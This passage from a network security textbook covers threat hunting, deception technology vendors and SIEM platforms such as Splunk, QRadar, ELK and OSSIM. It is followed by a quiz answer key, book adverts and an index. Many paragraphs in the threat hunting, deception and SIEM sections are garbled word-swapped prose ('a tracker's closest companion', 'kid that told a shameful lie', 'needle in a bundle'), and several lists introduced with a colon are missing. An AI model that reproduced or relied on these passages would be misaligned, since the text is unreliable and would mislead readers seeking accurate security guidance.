usefulness. For example, brand protection and takedown services can be carried out via
phishing, rogue apps, site defacement, fake social media accounts, typosquatting, and
credential and information leaks. Services such as volon.io, IntSights, and iZOOlogic have a
good reputation when it comes to these aspects.
Now that we have understood the importance and usage of threat intelligence platforms,
we will take a look at a security domain that helps analysts hunt for threats in their
environment using the intelligence that's been gathered from these threat intelligence
vendors.
But with the constantly evolving nature of the threats and tactics used by attackers, it's
likely that some may not be detected due to these mitigations that are in place. Hence, it's
imperative that we have a process in place to actively and proactively hunt for threats in
our environment based on attack patterns, network/application anomalies, and hunt
hypotheses.
The objective of threat hunting is to actively identify existing compromises and threats that
are otherwise unknown to deployed security capabilities. Outcomes are leveraged to
support cyber response and improve existing detection/response capabilities.
[ 315 ]
Proactive Security Strategies Chapter 9
Accordingly, this section will take you through the components of threat hunting, the steps
in developing a hunting plan, the threat hunting maturity model, and, finally, a few
platforms for threat hunting.
1. Data collection:
Identification of key assets and the deployment of sensors.
Data enrichment and analysis of the structured and unstructured
dataset.
Collect events at scale and store them in the big data analytics
repository.
Enrich the events with additional data for an improved context.
2. Creating a hypothesis:
Create a valid hypothesis.
Collect inputs from the business and other security teams.
3. Exploration and analysis:
Validate or deny the hypothesis based on results.
Test the hypothesis, automate it for future use, and keep fine-tuning it.
4. Intrusion analysis:
Investigate potential intrusions and hunt for Tactics, Techniques, and
Procedures (TTPs) based on prevalent threats.
Find campaigns and correlate them with threat intelligence indicators.
Map to threat campaigns, assess the mitigation available, and create
detection signatures.
5. Enrichment and automation:
Eliminate noise and make the investigation more effective.
Automate the detection process.
Evaluate crown jewels and high-value targets for threats and the data
required for them.
Create and maintain a library of successful hunting techniques.
Now that we understand the different stages and the flow of a threat hunting exercise, let's
take a look at what components will be needed to kick off the hunt.
[ 316 ]
Proactive Security Strategies Chapter 9
Information: The hunter will evaluate logs from various devices, such as
endpoints and network devices, in order to understand the normal behavior and
metrics of the environment. This results in a huge amount of datasets that are
then pooled together at a central repository for triaging, conducting
investigations, and deriving inferences. For this situation, a great SIEM
arrangement is a tracker's closest companion.
Baselines: The next component is the establishment of a benchmark. This is
accomplished by studying and collecting data and metrics from the environment
in order to understand "what normal looks like." Next, we need to validate each
process, connection, and so on to assess whether they actually exist due to
business justification. If valid business justification is not found, then these
services, connections, and processes need to be analyzed as potentially malicious.
This exercise helps us be clear about what is running and why it's running in the
network. This also helps in closing unwarranted services and applications that
may be expanding the network to threats.
Threat intelligence: It is important to know what tactics, techniques, and
procedures are being actively leveraged by threat actors to target organizations.
Hence, integrating threat intelligence with the threat hunting process gives the
threat hunter an idea of what to hunt for and get a bigger picture and context of
any anomalies that they observe in their environment.
Threat intelligence and threat hunting as a pair can be compared to that of a spotter-sniper,
where threat intelligence spots the potential threat patterns and artifacts and threat hunting
"takes them out." Threat hunting alone can hunt and eliminate threats as well, but when
coupled with quality threat intelligence, its efficiency and effectiveness increases.
[ 317 ]
Proactive Security Strategies Chapter 9
There are a few other things to take into consideration, as depicted in the following
diagram:
Collect and process data: Again, it is beyond the realm of imagination to expect
that we can hunt for threats without quality information. It is fundamental to
prepare and characterize what information must be gathered and where it will be
unified and handled. As I mentioned previously, a SIEM arrangement is a
tracker's closest companion.
Establish the hypothesis: It is imperative to recognize what you are hunting for,
and everything starts with a business-situated theory that depends on the
genuine organization setting. The best approach is beginning with basic,
abnormal state addresses that are important for the organization's cybersecurity
methodology. Again, this will enable the tracker to concentrate on genuine
circumstances, bringing about a considerably more powerful risk hunting
program.
Hunt: Now, for the fun part! However, this is not always the case. Now and
again, threat hunting might be closer to crunching information and translating
results for a few hours, just to discover what you've speculated hasn't been
confirmed. As I mentioned previously, a tracker must exceed expectations in
terms of their specialized ability and joining territories, including data security,
measurable science, and knowledge investigation, but should likewise have a ton
of tolerance.
[ 318 ]
Proactive Security Strategies Chapter 9
Adopting such a threat hunting strategy can assist in uplifting the cybersecurity posture
and its maturity and help you form a significant, contextualized strategy that reflects the
threats that are faced by the organization. This is because there is no 100% secure
environment. With the right set of technologies, data points, and skills, a proficient threat
hunter can proactively detect advanced threats. Therefore, before committing to a specific
tool or platform, the organization should clearly outline the current level of maturity and
where they wish to go with it. Based on this, hiring the correct team and getting the right
tools, data points, and management support to work with the larger IT ecosystem of the
organization is important to the success of the threat hunting program.
Hunting
Maturity Features Contributing Attributes
Level
• Depends majorly on reactive alerts
HMM 0 Reactive approach
• Minimal or no regular data acquisition
• Consolidates threat intelligence indicators and artifacts
HMM 1 Current capability
• An average or elevated level of regular data acquisition
[ 319 ]
Proactive Security Strategies Chapter 9
Based on how your threat hunting team operated, the organization's objectives for the
hunting team, and the type of threats faced by the organization, this can be tweaked. The
idea is to set up a clear roadmap of things that need to be accomplished and the desired
level of an outcome to demonstrate increased efficiency and effectiveness.
Please refer to the following link for more insights into threat
hunting: https://www.sans.org/reading-room/whitepapers/
threathunting/paper/38525.
MITRE ATT&CK
Endgame threat hunting
Cybereason
MITRE ATT&CK
MITRE ATT&CK is a broad knowledge base and comprehensive framework that covers
over 200 different threat techniques that are known to be used by adversaries in an attack.
This provides the security team with the various techniques, tactics, and procedures that
well-known adversary groups leverage in their threat campaigns, along with inputs such as
data sources, which are required to monitor for such attacks, mitigations, and detection
recommendations.
[ 320 ]
Proactive Security Strategies Chapter 9
Blue teams can utilize ATT&CK's taxonomy to catalog, classify, and reference attackers and
their behaviors, which can give them to gain a better understanding of the threats that they
face and how to proactively identify and defend against them. It also enables a common
nomenclature for red and blue teams when it comes to attributing to adversarial techniques
and behaviors.
Endgame allows you deploy its platform in a variety of ways, such as by using a virtual
machine, an application, or the cloud. The console can be deployed as a virtual machine or
placed on a physical system such as an appliance. Once the initial installation is completed,
the next step is to deploy the agents/sensors onto all the endpoints in the network to enable
monitoring. These agents can now restrict malicious process executions and detect and
prevent other malicious activities at the endpoint.
They enable near real-time protection against most attack vectors at the endpoint. This is
the EDR flavor of Endgame. At the same time, it sends data back to the core console based
on what's been collected from the endpoint, which is further churned through AI/ML
engines to detect advanced threats and suspicious activity. This is where it applies its threat
hunting attributes:
[ 321 ]
Proactive Security Strategies Chapter 9
Endgame does a lot to hide its presence in the network, ironically using a lot of the same
stealth techniques as some APTs. There are no Endgame EXE files or directories on the
system for example. The reasoning behind this is to stop the threat actor from gaining
knowledge about the protection and mitigation solutions in the environment, which may
alert the attacker, causing them to use more evasive tactics. Endgame agents also provide a
tripwire and anti-tampering feature that alerts the core console of any (attempted)
unauthorized changes being made to the agents.
Cybereason
Cybereason was built to empower companies to defend against advanced attacks and find
unknown threats in their environment quickly and efficiently. Cybereason's threat hunting
platform provides threat hunters with the following capabilities:
[ 322 ]
Proactive Security Strategies Chapter 9
This concludes our discussion on the threat hunting process and platforms. With that, you
know how these platforms can be used for detecting threats in the environment.
[ 323 ]
Proactive Security Strategies Chapter 9
Even though we expect threat intelligence and threat hunting to be able to stop most, if not
all, cyber threats, this is not a realistic expectation. This is why, in the next section, we will
talk about a technological solution aimed at trapping a threat actor and preventing them
from causing harm to the actual corporate environment.
[ 324 ]
Proactive Security Strategies Chapter 9
Scale and automate at will: While the risk to corporate systems and information
is a day-by-day developing concern, once in a while, security groups get an
expansion in their financial limit to deal with the downpour of new threats.
Therefore, misdirection innovation can be an exceptionally welcome
arrangement. Mechanized cautions dispose of the requirement for manual
exertion and intercession, while innovation enables it to be scaled effectively as
the association and threat level develops.
From legacy to IoT: Deception innovation can be utilized to give breadcrumbs to
an immense scope of various gadgets, including inheritance situations, industry-
explicit conditions, and even IoT gadgets.
The way you can get into a decent fake system is by taking advantage of its acceptability. It
must not be too intensely protected that it can't be ruptured, nor must it be so powerless it
can't be accepted. If assailants can perceive bait, they can keep away from it; in this sense, it
must look, feel, and act like the remainder of the system:
[ 325 ]
Proactive Security Strategies Chapter 9
The essential advantage of deception tech is to quickly discover attackers in the network
with insignificant or zero false positives. When set up accurately, aggressors are baited into
the fake system. This doesn't ensure that there are no different interlopers, so deception
isn't a swap for other security controls. All things considered, it is a great compensatory
control that will identify and control the threat actor before any harm occurs.
When identified, the threat actor can be contained and checked, as well as removed
voluntarily. This is a proactive protection-remediation control that can be applied pre – not
post – exfiltration. Since the technology relies upon the discovery of quality as opposed to
known marks or known practices, it will recognize different types of interruption and
anomalies, whether it's a cybercriminal, a temporary worker accomplishing more than the
agreement determines, or even a representative looking for data about an up-and-coming
merger or procurement.
Illusive Networks
Attivo Networks
Smokescreen
TrapX Security
Illusive Networks
Illusive Networks consists of experienced security subject matter experts who have
comprehensive experience in the domain of cyber warfare and threat intelligence. Its focus
has been on understanding, identifying, and deterring APTs and other unconventional
attacks that circumvent traditional security mitigations in an environment.
[ 326 ]
Proactive Security Strategies Chapter 9
Illusive saturates the target network with ambiguous information that makes it difficult for
the attacker to navigate smoothly and yield confidential information from the target
environment, or even attack the production environment.
Attivo Networks
Attivo Networks is a market-leading service provider in the deception technology segment
that enables early detection and responses against threats. It does this by utilizing its
custom decoys to create a mirage of the corporate environment, aimed at trapping the
threat actor.
[ 327 ]
Proactive Security Strategies Chapter 9
It also offers full network visibility into threats and offers multiple interesting features, such
as malware analysis within a centralized management console. It offers protection from
ransomware, persistent threats, stolen credentials, and man-in-the-middle attacks.
[ 328 ]
Proactive Security Strategies Chapter 9
Once an activity has been detected on the decoy, an event is created that encapsulates the
collected system's information and the attacker's actions and intent. IllusionBLACK
provides decoys for the entire kill chain, giving you unparalleled coverage and maximizing
the probability of an attacker engaging with a decoy, resulting in detection. It
provides detection for the following:
Recon phase
Lateral movement phase
Exfiltration phase
Malware attacks
APT
MITM attacks
It also has out-of-the-box integrations for the following technologies and protocols:
SIEM
Switch capabilities
DHCP
DNS
EDR
Sandboxing
ATP
Orchestration Engine
Active Directory
Firewall and IDS
We can use two methods to choose how and where to deploy the decoys, as follows:
Across geolocations
Across network subnets
[ 329 ]
Proactive Security Strategies Chapter 9
Hardware appliances
Software appliances
Cloud-based infrastructure
Smokescreen IllusionBLACK also uses artificial intelligence and machine learning for
deception campaigns and threat analysis/hunting.
TrapX Security
TrapX is another niche player in the deception technology domain. It intercepts real-time
threats while giving insights into the attacker's tactics, techniques, and
procedures. Organizations utilize TrapX to fortify their business resiliency and minimize
the cost of a data breach and other potential threats. It also has the perceived capability to
respond to zero-day vulnerabilities with the help of their virtualized sensor networks of
honeypots.
[ 330 ]
Proactive Security Strategies Chapter 9
It initiates this operation by deploying decoys at the endpoints. These are low interactive
modules intended to restrict the attacker's ability to act. Thereafter, we have medium
interaction traps that mimic a typical enterprise environment. These are not fully
operational systems but showcase the attributes that can be used to deceive the attacker. A
determined threat actor is moved to a high interaction honeypot, (a virtual) machine with a
functioning operating system that contains legit imate applications and spawned activity
that would be found on an actual system on an actual network.
The behaviors that are observed from the honeypots are captured and routed to the IR team
via platforms such as SIEM. The idea is to bait the threat actor to go to endpoints by using
decoys and keeping them engaged with the placed traps. TrapX comes with features such
as event analyzer, event correlation, process lineage, forensics, and attack visualization. All
this helps in gaining clarity and visibility into the activities that are being conducted by the
attacker, along with significant plan mitigation strategies.
With that, we have finished our discussion on the various proactive security solutions that
are available, such as threat intelligence, threat hunting, and deception technologies. In
order to make these technologies work together seamlessly and derive the best value from
the alerts coming in from these solutions, we need to have a centralized platform where
more context can be derived. This need is going to be fulfilled with the help of a SIEM
platform. Hence, in the next section, we will discuss some of the top SIEM solutions and the
value they generate.
SIEM is a product that collates and investigates logs from a wide range of assets over your
whole IT foundation. SIEM gathers security information from system gadgets, servers, and
space controllers, and that's only the tip of the iceberg. It stores, standardizes, totals, and
performs an examination of that information to find patterns, distinguish threats, and
empower associations to research any alarms.
[ 331 ]
Proactive Security Strategies Chapter 9
At its core, SIEM is an information aggregator, search, and revealing framework. SIEM
assembles gigantic measures of information from your whole arranged condition before
uniting it and making that information available to everyone. With the information
ordered, spread out, and readily available, you can look into information security breaks in
as much detail as required.
Capabilities of SIEM
Today, most SIEM frameworks work by sending different accumulated inputs from various
IT operations, teams, along with assembled security-related events from endpoints, servers,
and so on. This is similar to what specific security hardware does, such as firewalls,
antivirus, other security devices. The events are forwarded to a unified administration
resource (SIEM) where security analysts filter through the events to filter the noise, false
positives, and legitimate activities and investigate or escalate the actual security incidents
for deeper analysis.
In certain frameworks, pre-handling may occur at edge gatherers, with certain occasions
being provided to an administration hub. Along these lines, the volume of data that's being
imparted and put away can be decreased. Even though headways in AI are helping
frameworks to hail peculiarities in a precise manner, investigators should even now give
input, persistently teaching the framework about the Earth.
Here are the absolute most significant highlights to audit when assessing SIEM items:
[ 332 ]
Proactive Security Strategies Chapter 9
A few clients have discovered that they have to keep up with two separate SIEM answers to
get the most out of each reason since SIEM can be fantastically uproarious and asset
concentrated: as a rule, they favor one for information security and one for consistency.
SIEM's essentially were used for logging, collecting, and processing of information from
different sources for different purposes. One substitute use case is to help show consistency
for guidelines such as HIPAA, PCI, SOX, and GDPR.
SIEM devices also produce information you can use to limit the board's ventures. You can
follow transmission capacity and information development after some time to anticipate
development and planning purposes. In the scope quantification world, information is
critical, and understanding your present utilization and patterns enables you to oversee the
development process and evade enormous capital consumptions as a reactionary measure
versus counteractive action.
SIEM applications provide restricted logical data about their local occasions, and SIEMs are
known for their vulnerable side regarding unstructured information and messages. For
instance, you may see an ascent in system action from an IP address, but not the client that
made that traffic or the records that were received.
What resembles a huge exchange of information could be kind and justified conduct, or it
could be a robbery of petabytes of touchy and basic information. An absence of setting
security cautions prompts a "kid that told a shameful lie" worldview: in the end, your
security will be desensitized to the alerts going off each time an occasion is activated.
SIEM applications can't arrange information as touchy or non-delicate and thus can't
recognize authorized documents being moved due to suspicious actions that can be
harmful to client information, protected innovation, or organization security.
[ 333 ]
Proactive Security Strategies Chapter 9
Finally, SIEM applications are just as competent as the information they gather. Without
placing extra settings on that information, IT is frequently left pursuing false alerts or
generally inconsequential issues. The setting is key in the information security world to
realize what fights need to be battled. The greatest issue is when clients tell us that when
they use SIEM, it's very hard to analyze and investigate security occasions. The volume of
low-level information and the high number of alarms that arise causes a "needle in a
bundle" impact: clients come across an issue but regularly come up short regarding its
lucidity and setting, which means they can't follow up on that issue right away.
SIEM platforms
Before we conclude this chapter, let's discuss a few SIEM platforms. The ones we are going
to discuss are as follows:
Splunk
ArcSight Enterprise Security Manager
IBM QRadar
ELK SIEM
AlienVault OSSIM
Splunk
Splunk is one of the most popular and widely used SIEM platforms on the market. It has
brilliant ingestion, indexing, and scalability features. Some of the key advantages of Splunk
are as follows:
[ 334 ]
Proactive Security Strategies Chapter 9
Splunk is available in both on-premises as well as cloud offerings, with pricing based on the
quantity of data ingestion or Events per Second (EPS). One of the major challenges with
Splunk is its lack of multi-tenancy and the high license cost involved.
[ 335 ]
Proactive Security Strategies Chapter 9
The good part about ArcSight is that it allows us to provide multi-tenancy, which is of great
assistance when dealing with different business entities that we'll be monitoring as it allows
us to use one SIEM setup. Specifically for large conglomerates with multiple businesses or
consulting service providers, ArcSight's Data Platform and the ArcSight Investigate module
complement the ESM by providing a complete suite of open architecture data acquisition,
robust real-time event correlation, and investigation for detecting unknown security threats
in the environment.
Some of the key advantages and benefits that are provided by ArcSight are as follows
[ 336 ]
Proactive Security Strategies Chapter 9
However, there are two main challenges surrounding ArcSight: the lack of innovation and
upgrades available on the platform when it comes to new features, and its lack of readily
available, out of the box log integrations.
IBM QRadar
IBM QRadar helps security analysts monitor, detect, and prioritize threats in business
environments. QRadar utilizes advanced analytical engines in order to identify and track
threats based on the data that's injected from the environments and correlate it with
vulnerability details and threat intelligence.
[ 337 ]
Proactive Security Strategies Chapter 9
Good integration mechanism, with more than 400+ log sources processing
millions of events per second
Intuitive dashboards with user-friendly GUI
Quick processing with powerful admin features
QRadar traditionally has challenges with its disaster recovery setup and user interface,
which isn't that great. Licensing costs and customization of the platform when it comes to
dealing with false positives is another issue that many organizations have trouble dealing
with.
ELK SIEM
ELK stands for Elasticsearch, Logstash, and Kibana. When combined, they provide an
analytical platform capable of delivering real-time actionable insights for mission-critical
use cases. The entire process can be simplified with the help of machine learning-based
anomaly detection and alerting capabilities. ELK is made up of the following attributes:
Recently, Beats also entered the stack, allowing agent-based single-purpose data shipping.
[ 338 ]
Proactive Security Strategies Chapter 9
The main benefit of the ELK platform is represented by the fact that it is open source. Some
of its other advantages are as follows:
As an open source technology, it's natural for it to have some cons. Its main disadvantages
are the lack of correlation rules provided by default and the need for major improvements
regarding incident management.
[ 339 ]
Proactive Security Strategies Chapter 9
AlienVault OSSIM
AlienVault's OSSIM debuted in 2003 and has since been a dominant choice for
organizations looking for a free SIEM. They also offer a paid version known as USM.
OSSIM leverages AlienVault's Open Threat Exchange (OTX) to provide the SIEM platform
with real-time threat intelligence feeds. The platform itself comes with a lot of stock
integrations with leading products such as Snort, OpenVAS, and OSSEC, among others.
Such integrations make the life of a security engineer and an analyst pretty smooth
operationally and save time and effort for the organization.
[ 340 ]
Proactive Security Strategies Chapter 9
It is open source.
Provides correlation and correlation directives.
Risk calculation mechanism implemented.
Quick and easy installation.
Complex but readable reports.
There are no major disadvantages to this platform, so in my opinion, this would be the best
option for a SIEM platform when you have a tight budget.
In an industry survey conducted by Sophos in August 2019, five key points were
highlighted that are major hurdles in the implementation of cyber security strategies. These
are as follows:
Creating and reviewing KPIs, including those for non-technical aspects. They
need to focus more on non-traditional attributes of the security program and
ensure the organization's maturity is moving in the right direction.
Supply chain and third-party contracts and assessing the engagement model
concerning security expectations and requirements.
Infusing new services and applications into the environment with security in
mind by integrating security SMEs into each phase of the solution and design.
[ 341 ]
Proactive Security Strategies Chapter 9
OSSIM has certain areas that need improving, such as its reporting templates, which may
not always translate the value or key insights that you may be looking for. Log ingestion
and data aggregation are other key challenge areas that you may come across.
This concludes our discussion on the various SIEM platforms that are available to us. We
have learned about the top platforms in the industry from both commercial and open
source segments, and also discussed the key features that they offer to security teams.
Summary
In this chapter, we took a brief look at some of the technical aspects that should be part of
any organization's security strategy, whether this is threat intelligence, threat hunting,
deception technology, or SIEM. The important aspect to understand here is that we can
have all the technology in the world at our disposal, but making them work effectively and,
more importantly, synchronously with the other platforms is very important. This is
something that takes as much focus at the decision-making table as the technical
groundwork.
[ 342 ]
Proactive Security Strategies Chapter 9
By completing this chapter, you now understand the different processes and platforms that
you can use as part of your cyber arsenal. You should now be able to recommend different
solutions to your organization as per the need of the hour and fine-tune them for the best
results, as well as showcase the business outcome and value proposition that's delivered as
part of enhancing the proactive security detection and response capabilities at hand.
This concludes our nine-chapter long journey in pursuit of understanding the different
security fundamentals and measures that can assist in enhancing the security of your
network. Do note that all technologies and tools will be (near) obsolete in time due to the
constantly changing threat landscape. So, in order to stay on top of the game, keep
researching the latest threats and understand how they operate and impact your
organization so that you can deploy mitigations appropriately. Also, there's no shortcuts to
success, so ensure that you and your team understand the fundamentals of the networks
and technologies in use so that you can work around issues and challenges with ease. I
wish you the very best with your professional journey ahead and sincerely hope that this
book helped you learn and fulfill the objectives and expectations that you had for network
security.
Questions
The following is a list of questions that you can use to test your knowledge regarding this
chapter's material. You will find the answers in the Assessments section of the Appendix:
[ 343 ]
Proactive Security Strategies Chapter 9
[ 344 ]
Proactive Security Strategies Chapter 9
9. Which of the following would not be used to describe the analytic techniques
used in UEBA?
Heuristic
Probabilistic
Deterministic
Risk-based
10. Implementing a SecOps process where the security team is engaged earlier by
engaging with IT operations is referred to as what?
UEBA
Shifting left
DevOps
None of the above
Further reading
Take a look at the following links to build on the knowledge you've gained from this
chapter:
[ 345 ]
Proactive Security Strategies Chapter 9
[ 346 ]
Assessments
Chapter 1
Answer 1: Router
Answer 2: CHAP
Answer 3: Spoofing
Answer 4: OCTAVE-S
Answer 5: Scripting
Answer 6: Build
Chapter 2
Answer 1: To determine the particular security mechanisms you need, you must perform a
mapping of the particular cloud service model to the particular application you are
deploying
Answer 2: KMIP
Answer 4: SAS70
Answer 6: PaaS
Answer 7: Public
Answer 8: WPA3
Chapter 3
Answer 1: Vishing
Answer 3: Botnet
Answer 4: Botnet
Answer 5: Peer-to-peer
Answer 6: Self-replicate
Chapter 4
Answer 1: John the Ripper
Answer 2: Redirect
Answer 5: Nikto
Answer 6: /etc/shadow
Chapter 5
Answer 1: SS7
Answer 3: AES
[ 348 ]
Assessments
Answer 6: TLS
Chapter 6
Answer 1: Network forensics
Answer 2: Helix
Answer 3: Tcpdump
Answer 4: PsTools
Answer 5: Snort
Answer 6: 3
Answer 7: PCAP
Answer 8: HDHOST
Chapter 7
Answer 1: Nmap
Answer 4: LC4
Answer 5: Outline the overall authority, scope, and responsibilities of the audit function
[ 349 ]
Assessments
Chapter 8
Answer 1: Environmental technical architecture
Answer 2: Accountability
Chapter 9
Answer 1: STIX
Answer 4: Automation
Answer 5: MTTD
Answer 8: 20%
Answer 9: Deterministic
[ 350 ]
Other Books You May Enjoy
If you enjoyed this book, you may be interested in these other books by Packt:
Networking Fundamentals
Gordon Davies
ISBN: 978-1-83864-350-8
Become well versed in networking topologies and concepts
Understand network infrastructures such as intranets, extranets, and more
Explore network switches, routers, and other network hardware devices
Get to grips with different network protocols and models such as OSI and
TCP/IP
Work with a variety of network services such as DHCP, NAT, firewalls, and
remote access
Apply networking concepts in different real-world scenarios
Other Books You May Enjoy
ISBN: 978-1-78995-809-6
Execute Python modules on networking tools
Automate tasks regarding the analysis and extraction of information from a
network
Get to grips with asynchronous programming modules available in Python
Get to grips with IP address manipulation modules using Python programming
Understand the main frameworks available in Python that are focused on web
application
Manipulate IP addresses and perform CIDR calculations
[ 352 ]
Other Books You May Enjoy
[ 353 ]
Index
about 221
A fundamentals 223
Acrylic Wi-Fi Professional auditing process
features 63 audit report stage 232
Adaptive Access Control (AAC) 58 data analysis stage 231
advanced persistent threats (APT) data gathering stage 231
about 281, 284 follow-up stage 232
essential eight 284, 285 planning stage 231
stages 283 research stage 231
versus cyber-attack 282 auditor 230
advancements, in network forensics practices authentication 9
about 213 Authentication, Authorization, and Accounting
big data analytics-based forensics 214, 215 (AAA) 17, 109
tabletop forensics exercise 215 authorization 9
AI-ML driven attacks 105, 106 automated exploitation
AlienVault OSSIM 340, 341 performing 130
Amazon Web Services (AWS) automated tools, penetration testing
about 45, 46 Armitage 133
security features 46 comparing 135
Android.Bmaster 93 OpenVas 130, 131
ArcSight Enterprise Security Manager (ESM) 335, Sparta 131, 132
336 availability 9
Armitage 133 AWS' Shared Responsibility Model
attack frameworks, towards ICS industries about 43
about 170 reference link 43
cyber kill chain 170, 171 AWS, security features
information sharing and analysis centers (ISACs) Antivirus/Anti-malware 46
171
architecture 46
threat landscape 172, 174
continuous data protection 48
AttackIQ 183
defense 48
Attivo Networks 327, 328
monitoring and logging 46
audit report (sampling) 255, 257
network isolation 47
audit report stage
patch management 46
detailed findings 232
security best practices, automation 48
executive summary 232
security event response 49
audit scope 223
threat defense 47
audit
traceability 47
well-defined identity capabilities 47 design and architecture review 243
Azure AD addresses documentation 245
references 54 infrastructure for monitoring and management
Azure Disk Encryption (ADE) 55 244
network infrastructure security 244
B performance monitoring and analysis 245
backdoors 95 physical inventory 243
big data analytics-based forensics 214, 215 planning phase 242
black-box testing 162 confidentiality 9
blue team 161 Confidentiality, Integrity, and Availability (CIA) 29
boardroom discussions Continuous Integration and Continuous
strategies 296, 297 Deployment (CI/CD) 48
botnet threats continuous monitoring 14, 113, 114
fixing 94 controls
botnets about 226
about 91, 92 administrative controls 226
Android.Bmaster 93 corrective controls 226
DroidDream 92 detective controls 226
mirai botnet 93 physical controls 226
smominru botnet 93 preventative controls 226
tigerbot 92 recovery controls 227
zeus 93 technical controls 226
bring your own device (BYOD) 51 critical infrastructure 168
Browser Exploitation Framework (BeEF) 150 critical infrastructure exploitation
Burp Suite 153 examples 175, 176
business continuity plan (BCP) cyber kill chain 170, 171
about 269 cyber perimeter
components 270 establishing 276, 277
cyber resilience
C about 13, 275
pillars 275
CALDERA 183
cyber risk assessment
CamScanner 93
about 272
Capture the flag (CTF) 161
types 274
castle approach 13
cyber threat management
cavity virus 90
business continuity plan (BCP) 269, 270, 272
CipherCloud
concepts 268, 269
about 57
cyber perimeter, establishing 276, 277
platforms and features 57, 59, 60
cyber resilience 275
cloud computing
cyber risk assessment 272, 274
countermeasures 61
cybersecurity strategic governance framework
securing 60 274
security threats 61 disaster recovery (DR) 269, 270, 272
common vulnerability exposures (CVEs) 139 governance, risk, and compliance (GRC) 275
comprehensive checklist, network audit threat intelligence, obtaining 277
configuration management 245
[ 355 ]
threat tracking 278, 279 disaster recovery (DR) 269
cyber-attack Distributed Denial of Service (DDOS) attack 13
versus advanced persistent threats (APT) 282 drive-by download 105
Cybereason platform DroidDream 92
about 322 DSHELL 209
capabilities 322 due diligence 13
cybersecurity strategic governance framework
about 274 E
steps 274 eavesdropping 189
cybersecurity Elasticsearch, Logstash, and Kibana (ELK) 338,
business aspect 298 339
endgame platform 321, 322
D endpoint detection and response (EDR)
Damballa network threat analysis 199, 200 about 291, 292
Data Loss Prevention (DLP) 58 capability 291
DDoS attacks engagement models and methodologies, pen
about 99 testing
application-based attacks 100 black box 162
volume-based attacks 100 gray box 162
DDoS threats white box 162
fixing 100, 101 essential eight
deception technology vendors and platforms about 284
about 326 techniques 284
Attivo Networks 327, 328 Exploit Kits (EKs) 105
Illusive Networks 326, 327 Extensible Authentication Protocol (EAP) 64
Smokescreen IllusionBLACK Deception 328,
330 F
TrapX Security 330, 331 fake security alerts 83
deception technology File Server Resource Manager (FSRM) 104
about 324 FireEye iSIGHT 310, 311
need for 324, 325, 326 firmware reverse engineering
vendors and platforms 326 about 184
defense mechanisms reference link 185
about 108 forensic incidents
mail security, enhancing 109 technical capabilities, for responding 196, 197
strong password policies, implementing 109 forensics tools
third-party confidential information, safeguarding about 201
108 DSHELL 209
vulnerability management policies 110 Hakabana 206, 207
Defense-in-Depth (DiD) 10, 13 LogRhythm Network Monitor 210, 211
Denial of Service (DoS) 13, 188 NetWitness NextGen 207, 208
digital evidence NetworkMiner 205, 206
dealing with 213 NIKSUN Suite 202, 203
Digital Shadows SearchLight 314, 315 Security Onion 204
Dirb 139 Solera Networks DS 208
[ 356 ]
Wireshark 201, 202 infrastructure protection, using Microsoft Azure
Xplico 204, 205 infrastructure, criticality 53, 54
Forensics Zachman (FORZA) 212 infrastructure protection
Foreseeti 183 using Microsoft Azure 52
insider threats
G about 85
General Data Protection Regulation (GDPR) 304 external threat actors 86
governance framework 230 fixing 87, 88
governance, risk, and compliance (GRC) inadvertent threat 86
about 275 malicious threat 86
aims 276 Integrated Digital Investigation Process (IDIP) 212
Gramm-Leach-Bliley Act (GLBA) 230 integrated threat defense architecture
gray-box testing 162 creating 107
creating, objectives 107
H integrity 10
International Electrotechnical Commission (IEC)
Hakabana 206, 207
213
Health Insurance Portability and Accountability Act
International Organization for Standardization
(HIPAA) 230
(ISO) 213
heating, ventilation, and air conditioning (HVAC)
Internet of Things (IoT)
173
about 177
host-based IDS (HIDS) 255
application layer 177
I network layer 177
perception layer 177
IBM QRadar 337, 338 security challenges 179
IBM's X-Force Exchange 311, 312 Internet Protocol (IP) 185
ICS industries internet worms 90
attack frameworks 170 IntSight's Enterprise Threat Intelligence 312, 313,
top threats and vulnerable points 174 314
Identity Access Management (IAM) 42 IoT network security 177, 178
identity management IoT networks
using, Microsoft Azure 52 penetration testing 176, 180
Illusive Networks 326, 327 IoT pen tester
incident coordinator 25 skill requirements 178
incident manager 25 IoT pen testing lab
incident response team 24 firmware software tools 182
industrial control systems (ICS) 168, 169 setting up 181
Industrial IoT (IIoT) 9 software tool requisites 182
industry standards 229 web application software tools 182
INetSim
URL 289 K
Infection Monkey 183
Kali Linux 136
Information Commissioners Office (ICO) 304
Key Management Interoperability Protocol (KMIP)
information sharing and analysis centers (ISACs) 68
171
Key Management Service (KMS) 46
Infrastructure as a Service (IaaS) 41
[ 357 ]
security layers 51
L security technologies 50, 51
Living off the Land (LotL) 79 using, for identity management 52
local area network (LAN) 12 using, for infrastructure protection 52
LogRhythm Network Monitor 210, 211 Zero Trust model 51
Million Dollar Mobile Botnet 93
M mirai botnet 93
macro virus 90 Mitigation Platform 312, 313, 314
malvertising 97, 98 MITRE ATT&CK 320
malvertising threats Multi-Factor Authentication (MFA) 44
fixing 98 Multimedia Internet Keying (MIKEY) 189
malware analysis, lab architecture
isolated virtual network, creating 290 N
snapshots, creating 290 NeSSi2 183
snapshots, restoring 290 Nessus 238, 239
malware analysis Nessus professional 113
about 285 NetformX 237
lab architecture 289 NetWitness NextGen 207, 208
lab, overview 287 network assessment and auditing tools
lab, setting up 288, 289 about 235
process 286, 287 NetformX 237
types 285 Nmap 237
Managed Service Providers (MSPs) 28 Open-AudIT 236, 237
manual exploitation SolarWinds 235
performing 136 network attacks 78, 79
manual penetration testing tools network audit checklist
Browser Exploitation Framework (BeEF) 150, about 242
151, 152 comprehensive checklist 242
Burp Suite 153 network audit tools
Dirb 139, 140, 141, 142 exploring 234
Kali Linux 136 network audit, risk management
Metasploit 143, 145, 146, 147, 148, 150 about 227
Nikto 139 risk assessment 228
Nmap 136, 138 strategies 229
Metasploit 143 network audit, types
Microsoft Azure, encryption assessment 224
data, classifying 54 audit 224
data, identifying 54 review 224
Microsoft Azure, network security network audit
internet protection 56 about 221
network integrations 57 case study 246
virtual networks 56 need for 221, 222
Microsoft Azure network auditing
encryption 54, 55 best practices 258, 259
network security 55 key concepts 223
[ 358 ]
network audits, foundational pillars deployment phase 15, 21
about 225 designing stage 15, 17, 18
controls 226 planning and analysis stage 15, 16
policy 225 post-deployment phase 22
procedures 225 testing phase 15, 19, 20
standards 225 network security audit
network choke-points 12 audit report phase 233
network forensic investigation process approach data analysis phase 233
reference link 212 data gathering phase 233
network forensics follow-up phase 234
collection 195 performing 232
communication 199 planning and research phase 232, 233
communication layers 198 network security effectiveness, key attributes
